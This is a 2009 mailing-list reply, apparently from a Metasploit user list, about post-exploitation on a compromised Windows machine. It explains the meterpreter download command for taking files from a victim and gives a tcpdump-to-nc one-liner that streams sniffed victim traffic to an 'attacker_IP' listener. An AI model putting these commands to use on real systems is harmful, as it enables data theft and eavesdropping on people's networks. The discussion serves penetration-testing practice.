2009/2/9 Bryan Richardson <btri...@gmail.com>

> Thanks Anastasios,
>
> So, am I correct in assuming this is how one is dumped into a Windows shell
> after executing an exploit on a vulnerable Windows machine?

Bryan, if I am following you correctly, yes, using the download command
supplied by meterpreter payload you can get a file from victim's machine to
your machine. Note that in the case of windows you will have to escape the \
with an extra \ when(if) specifying the full path of the file's source and
destination, obviously if you do "download file.txt file.txt" it will try to
get the file from victim's current directory and save it to your current
directory.

> I was hoping that I could 'channelize' a traffic sniffer such that the
> sniffed traffic would be sent back to me in real time for real time
> analysis... it doesn't seem like this is the case.

I agree, real-time traffic in some environments really helps the whole task

Ultimately, what would be cool is to have my real-time traffic analysis
> software listening on a particular port and have some way of sending the
> sniffed traffic from the compromised machine to that particular port on my
> local machine.

I think it worths trying piping your live data through nc as we do with dd,
but I am not sure if it will work in your case, oh you will have to let your
nc traffic pass the firewall.

For example:
On victim you can try something like: tcpdump -e host victim_ip and port 23
| nc attacker_IP attacker_listening_port
On attacker: nc -l -p attacker_listening_port | wireshark -i -
     Taken from wireshark's man
           " .... Pipe names should be either the name of a FIFO (named
pipe) or
           ''-'' to read data from the standard input.  Data read from pipes
           must be in standard libpcap format...."

Last you may also play with the channel read/write options, so to pass nc's
traffic through the channel (?), maybe someone else can reach more light
here

Let us know what worked and what didnt anyway

Tasos

--
AM